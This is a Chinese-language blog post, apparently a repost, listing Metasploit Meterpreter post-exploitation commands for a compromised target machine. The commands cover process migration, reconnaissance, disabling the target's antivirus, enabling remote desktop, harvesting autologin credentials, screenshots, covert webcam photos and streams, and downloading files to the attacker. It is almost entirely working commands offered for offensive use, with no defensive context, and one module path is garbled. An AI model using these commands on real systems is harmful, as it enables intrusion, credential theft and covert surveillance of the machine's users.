1. 程式人生 > >滲透之——Metasploit-Meterpreter Shell資訊收集相關的命令

滲透之——Metasploit-Meterpreter Shell資訊收集相關的命令

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/85944005

PS:以下所有的命令都是在Metasploit-Meterpreter Shell下執行的。

一、程序遷移

1、獲取目標機正在執行的程序
ps

2.檢視Meterpreter Shell的程序號
getpid

3.將Meterpreter Shell程序繫結到其他程序中
migrate 要繫結到的程序id號

4.系統自動尋找合適的程序遷移
run post/windows/manage/migrate

二、系統命令

1.檢視目標機的系統資訊
sysinfo

2.檢視目標機是否執行在虛擬機器上
run post/windows/gather/checkvm

3.檢視目標機最近的執行時間
idletime

4.檢視目標機完整的網路設定
route

5.將當前會話放到後臺
background

6.檢視目標機器上已經滲透成功的使用者名稱
getuid

7.關閉目標機防毒軟體
run post/windows/manage/killav

8.啟動目標機的遠端桌面協議
run post/windows/manage/enable_rdp

9.檢視目標機的本地子網情況
run post/windows/manage/autoroute

10.列舉當前有多少使用者登入了目標機
run post/windows/gather/enum_logged_on_users

11.列舉安裝在目標機上的應用程式
run post/windows/gather/enum_applications

12.抓取目標機自動登入的使用者名稱和密碼
run post/windows/gather/credentials/windows)autologin

13.抓取目標機螢幕截圖
load espia
screengrab
或者
screenshot

14.檢視目標機有沒有攝像頭
webcam_list

15.開啟目標機攝像頭拍照
webcam_snap
此命令會將目標機攝像頭拍照的圖片,以圖片的形式儲存在攻擊機的/root目錄下

16.開啟攝像頭直播模式
webcam_stream
此命令會將目標機攝像頭錄製的視訊,以html檔案的形式儲存在攻擊機的/root目錄下

17.進行目標機shell
shell

18.停止Meterpreter會話或者停止Shell會話返回Meterpreter
exit

三、檔案系統命令

1.檢視當前處於目標機的哪個目錄
pwd或getwd

2.檢視當前處於本地的哪個目錄
getlwd

3.列舉目標機當前目錄中的所有檔案
ls

4.切換目標機目錄
cd

5.搜尋C盤所有以.txt為副檔名的檔案
search -f *.txt -d c:\
其中,-f引數用於執行搜尋檔案模式,-d引數用於指定在哪個目錄下進行搜尋

6.下載目標機C盤的test.txt檔案到攻擊機/root下
download c:\test.txt /root

7.上傳攻擊機root目錄下的test.txt檔案到目標機C盤下
upload /root/test.txt c:\